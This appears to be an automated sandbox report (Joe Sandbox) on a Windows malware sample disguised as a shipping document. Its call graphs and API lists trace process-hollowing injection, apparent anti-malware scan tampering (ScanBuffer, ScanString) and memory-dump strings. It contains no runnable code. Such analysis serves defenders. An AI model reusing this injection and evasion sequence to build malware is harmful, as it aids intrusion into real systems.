29101 2b21e24 29084->29101 29089 2b21724 10 API calls 29085->29089 29090 2b21c94 29086->29090 29128 2b21724 29086->29128 29095 2b21d2c 29088->29095 29098 2b21d48 29088->29098 29104 2b21dfc 29088->29104 29113 2b21cd7 29089->29113 29096 2b21724 10 API calls 29092->29096 29099 2b21fb2 29093->29099 29105 2b21724 10 API calls 29093->29105 29094 2b21e7c 29097 2b21724 10 API calls 29094->29097 29102 2b21e95 29094->29102 29100 2b21f82 29096->29100 29103 2b21f2c 29097->29103 29107 2b21d79 Sleep 29098->29107 29115 2b21d9c 29098->29115 29120 2b21a8c 8 API calls 29100->29120 29122 2b21fa7 29100->29122 29101->29094 29101->29102 29106 2b21e55 Sleep 29101->29106 29103->29102 29121 2b21a8c 8 API calls 29103->29121 29109 2b21724 10 API calls 29104->29109 29108 2b21fc1 29105->29108 29106->29094 29110 2b21e6f Sleep 29106->29110 29111 2b21d91 Sleep 29107->29111 29107->29115 29108->29122 29123 2b21a8c 8 API calls 29108->29123 29119 2b21e05 29109->29119 29110->29101 29111->29098 29112 2b21ca1 29118 2b21cb9 29112->29118 29152 2b21a8c 29112->29152 29114 2b21a8c 8 API calls 29113->29114 29117 2b21cfd 29113->29117 29114->29117 29125 2b21a8c 8 API calls 29119->29125 29127 2b21e1d 29119->29127 29120->29122 29124 2b21f50 29121->29124 29126 2b21fe4 29123->29126 29125->29127 29129 2b21968 29128->29129 29130 2b2173c 29128->29130 29131 2b21938 29129->29131 29132 2b21a80 29129->29132 29140 2b217cb Sleep 29130->29140 29142 2b2174e 29130->29142 29138 2b21947 Sleep 29131->29138 29145 2b21986 29131->29145 29133 2b21684 VirtualAlloc 29132->29133 29134 2b21a89 29132->29134 29136 2b216bf 29133->29136 29137 2b216af 29133->29137 29134->29112 29135 2b2175d 29135->29112 29136->29112 29169 2b21644 29137->29169 29139 2b2195d Sleep 29138->29139 29138->29145 29139->29131 29140->29142 29144 2b217e4 Sleep 29140->29144 29142->29135 29143 2b2182c 29142->29143 29146 2b2180a Sleep 29142->29146 29150 2b215cc VirtualAlloc 29143->29150 29151 2b21838 29143->29151 29144->29130 29147 2b215cc VirtualAlloc 29145->29147 29149 2b219a4 29145->29149 29146->29143 29148 2b21820 Sleep 29146->29148 29147->29149 29148->29142 29149->29112 29150->29151 29151->29112 29153 2b21aa1 29152->29153 29154 2b21b6c 29152->29154 29156 2b21aa7 29153->29156 29159 2b21b13 Sleep 29153->29159 29155 2b216e8 29154->29155 29154->29156 29158 2b21c66 29155->29158 29162 2b21644 2 API calls 29155->29162 29157 2b21ab0 29156->29157 29161 2b21b4b Sleep 29156->29161 29166 2b21b81 29156->29166 29157->29118 29158->29118 29159->29156 29160 2b21b2d Sleep 29159->29160 29160->29153 29163 2b21b61 Sleep 29161->29163 29161->29166 29164 2b216f5 VirtualFree 29162->29164 29163->29156 29165 2b2170d 29164->29165 29165->29118 29167 2b21c00 VirtualFree 29166->29167 29168 2b21ba4 29166->29168 29167->29118 29168->29118 29170 2b21681 29169->29170 29171 2b2164d 29169->29171 29170->29136 29171->29170 29172 2b2164f Sleep 29171->29172 29173 2b21664 29172->29173 29173->29170 29174 2b21668 Sleep 29173->29174 29174->29171

                                                                                                    Executed Functions

                                                                                                    Function 02B38BA8 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 6797 2b38ba8-2b38bab 6798 2b38bb0-2b38bb5 6797->6798 6798->6798 6799 2b38bb7-2b38c9e call 2b2493c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 6798->6799 6830 2b38ca4-2b38d7f call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 6799->6830 6831 2b3a6ef-2b3a759 call 2b244d0 * 2 call 2b24c0c call 2b244d0 call 2b244ac call 2b244d0 * 2 6799->6831 6830->6831 6875 2b38d85-2b390ad call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b230d4 * 2 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b24d8c call 2b24d9c call 2b385d4 6830->6875 6984 2b39120-2b39441 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b22ee0 call 2b22f08 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c GetThreadContext 6875->6984 6985 2b390af-2b3911b call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 6875->6985 6984->6831 7093 2b39447-2b396aa call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b3824c 6984->7093 6985->6984 7166 2b396b0-2b39819 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b384bc 7093->7166 7167 2b399b7-2b39a22 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 7093->7167 7257 2b39843-2b398ae call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 7166->7257 7258 2b3981b-2b39841 call 2b379ac 7166->7258 7192 2b39a28-2b39ba8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b379ac 7167->7192 7193 2b39a23 call 2b3881c 7167->7193 7192->6831 7297 2b39bae-2b39ca7 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b38ab8 7192->7297 7193->7192 7266 2b398b4-2b399ab call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b379ac 7257->7266 7298 2b398af call 2b3881c 7257->7298 7258->7266 7337 2b399b0-2b399b5 7266->7337 7349 2b39cfb-2b3a453 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b37cf8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b37cf8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c SetThreadContext NtResumeThread call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b22c2c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b38798 * 3 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 7297->7349 7350 2b39ca9-2b39cf6 call 2b389b0 call 2b389a4 7297->7350 7298->7266 7337->7192 7575 2b3a458-2b3a6ea call 2b38798 * 2 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 * 5 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b37ecc call 2b38798 * 2 7349->7575 7350->7349 7575->6831
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B3881C: LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
                                                                                                      • Part of subcall function 02B3881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
                                                                                                      • Part of subcall function 02B3881C: GetProcAddress.KERNEL32(74FA0000,00000000), ref: 02B38879
                                                                                                      • Part of subcall function 02B3881C: FreeLibrary.KERNEL32(74FA0000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74FA0000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3
                                                                                                      • Part of subcall function 02B385D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B38660
                                                                                                    • GetThreadContext.KERNEL32(00000A74,02B81420,ScanString,02B813A4,02B3A774,UacInitialize,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,UacInitialize,02B813A4), ref: 02B3943A
                                                                                                      • Part of subcall function 02B3824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B382BD
                                                                                                      • Part of subcall function 02B384BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B38521
                                                                                                      • Part of subcall function 02B379AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B37A1F
                                                                                                      • Part of subcall function 02B37CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C
                                                                                                    • SetThreadContext.KERNEL32(00000A74,02B81420,ScanBuffer,02B813A4,02B3A774,ScanString,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,00000A78,003E7FF8,02B814F8,00000004,02B814FC), ref: 02B3A14F
                                                                                                    • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000A74,00000000,00000A74,02B81420,ScanBuffer,02B813A4,02B3A774,ScanString,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,00000A78,003E7FF8,02B814F8), ref: 02B3A15C
                                                                                                      • Part of subcall function 02B38798: LoadLibraryW.KERNEL32(bcrypt,?,00000A74,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,UacScan), ref: 02B387AC
                                                                                                      • Part of subcall function 02B38798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387C6
                                                                                                      • Part of subcall function 02B38798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000A74,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize), ref: 02B38802
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                    • API String ID: 4083799063-51457883
                                                                                                    • Opcode ID: 36e23aec3e2034290f3169f197dd8805c8134dcf0e4cab9253220f4260ee2834
                                                                                                    • Instruction ID: a739fa68494b68729180e27db8bd6d6f415237a3fd8a7800f12e8c14729794c5
                                                                                                    • Opcode Fuzzy Hash: 36e23aec3e2034290f3169f197dd8805c8134dcf0e4cab9253220f4260ee2834
                                                                                                    • Instruction Fuzzy Hash: 3AE2FE35A50228DFDB12EB64CCD0ADE73BAAF55310F2045E1E14DABA14DE34AE4ACF51
                                                                                                    Function 02B38BA6 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 7653 2b38ba6-2b38bab 7655 2b38bb0-2b38bb5 7653->7655 7655->7655 7656 2b38bb7-2b38c9e call 2b2493c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 7655->7656 7687 2b38ca4-2b38d7f call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 7656->7687 7688 2b3a6ef-2b3a759 call 2b244d0 * 2 call 2b24c0c call 2b244d0 call 2b244ac call 2b244d0 * 2 7656->7688 7687->7688 7732 2b38d85-2b390ad call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b230d4 * 2 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b24d8c call 2b24d9c call 2b385d4 7687->7732 7841 2b39120-2b39441 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b246a4 * 2 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b22ee0 call 2b22f08 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c GetThreadContext 7732->7841 7842 2b390af-2b3911b call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c 7732->7842 7841->7688 7950 2b39447-2b396aa call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b3824c 7841->7950 7842->7841 8023 2b396b0-2b39819 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b384bc 7950->8023 8024 2b399b7-2b39a22 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 7950->8024 8114 2b39843-2b398ae call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 8023->8114 8115 2b3981b-2b39841 call 2b379ac 8023->8115 8049 2b39a28-2b39ba8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b379ac 8024->8049 8050 2b39a23 call 2b3881c 8024->8050 8049->7688 8154 2b39bae-2b39ca7 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b38ab8 8049->8154 8050->8049 8123 2b398b4-2b399b5 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b379ac 8114->8123 8155 2b398af call 2b3881c 8114->8155 8115->8123 8123->8049 8206 2b39cfb-2b3a6ea call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b37cf8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b37cf8 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c SetThreadContext NtResumeThread call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b22c2c call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b38798 * 3 call 2b2480c call 2b2494c call 2b246a4 call 2b24798 call 2b2494c call 2b246a4 call 2b3881c call 2b38798 * 2 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 * 5 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b2480c call 2b2494c call 2b24798 call 2b2494c call 2b38798 call 2b37ecc call 2b38798 * 2 8154->8206 8207 2b39ca9-2b39cf6 call 2b389b0 call 2b389a4 8154->8207 8155->8123 8206->7688 8207->8206
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B3881C: LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
                                                                                                      • Part of subcall function 02B3881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
                                                                                                      • Part of subcall function 02B3881C: GetProcAddress.KERNEL32(74FA0000,00000000), ref: 02B38879
                                                                                                      • Part of subcall function 02B3881C: FreeLibrary.KERNEL32(74FA0000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74FA0000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3
                                                                                                      • Part of subcall function 02B385D4: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B38660
                                                                                                    • GetThreadContext.KERNEL32(00000A74,02B81420,ScanString,02B813A4,02B3A774,UacInitialize,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,UacInitialize,02B813A4), ref: 02B3943A
                                                                                                      • Part of subcall function 02B3824C: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B382BD
                                                                                                      • Part of subcall function 02B384BC: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B38521
                                                                                                      • Part of subcall function 02B379AC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B37A1F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryMemoryVirtual$AddressAllocateContextCreateFreeHandleLoadModuleProcProcessReadSectionThreadUnmapUserView
                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                    • API String ID: 2852987580-51457883
                                                                                                    • Opcode ID: 12ec2a5cf8b09d876e8e1cf9cbb6f2b4238d21fea9a8bd697a77f19f1d031681
                                                                                                    • Instruction ID: 70296f05d11a88401721e9d019b62269f8676719c0b985bc7c43bd063f6bc056
                                                                                                    • Opcode Fuzzy Hash: 12ec2a5cf8b09d876e8e1cf9cbb6f2b4238d21fea9a8bd697a77f19f1d031681
                                                                                                    • Instruction Fuzzy Hash: F5E2FE35A50228DFDB12EB64CCD0ADE73BAAF55310F2045E1E14DABA14DE34AE4ACF51
                                                                                                    Function 02B25A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 8510 2b25a78-2b25ab9 GetModuleFileNameA RegOpenKeyExA 8511 2b25afb-2b25b3e call 2b258b4 RegQueryValueExA 8510->8511 8512 2b25abb-2b25ad7 RegOpenKeyExA 8510->8512 8517 2b25b62-2b25b7c RegCloseKey 8511->8517 8518 2b25b40-2b25b5c RegQueryValueExA 8511->8518 8512->8511 8513 2b25ad9-2b25af5 RegOpenKeyExA 8512->8513 8513->8511 8516 2b25b84-2b25bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 8513->8516 8519 2b25bbb-2b25bbf 8516->8519 8520 2b25c9e-2b25ca5 8516->8520 8518->8517 8521 2b25b5e 8518->8521 8523 2b25bc1-2b25bc5 8519->8523 8524 2b25bcb-2b25be1 lstrlenA 8519->8524 8521->8517 8523->8520 8523->8524 8525 2b25be4-2b25be7 8524->8525 8526 2b25bf3-2b25bfb 8525->8526 8527 2b25be9-2b25bf1 8525->8527 8526->8520 8529 2b25c01-2b25c06 8526->8529 8527->8526 8528 2b25be3 8527->8528 8528->8525 8530 2b25c30-2b25c32 8529->8530 8531 2b25c08-2b25c2e lstrcpynA LoadLibraryExA 8529->8531 8530->8520 8532 2b25c34-2b25c38 8530->8532 8531->8530 8532->8520 8533 2b25c3a-2b25c6a lstrcpynA LoadLibraryExA 8532->8533 8533->8520 8534 2b25c6c-2b25c9c lstrcpynA LoadLibraryExA 8533->8534 8534->8520
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B20000,02B4D790), ref: 02B25A94
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AB2
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AD0
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B25AEE
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B25B37
                                                                                                    • RegQueryValueExA.ADVAPI32(?,02B25CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001), ref: 02B25B55
                                                                                                    • RegCloseKey.ADVAPI32(?,02B25B84,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B25B77
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B25B94
                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B25BA1
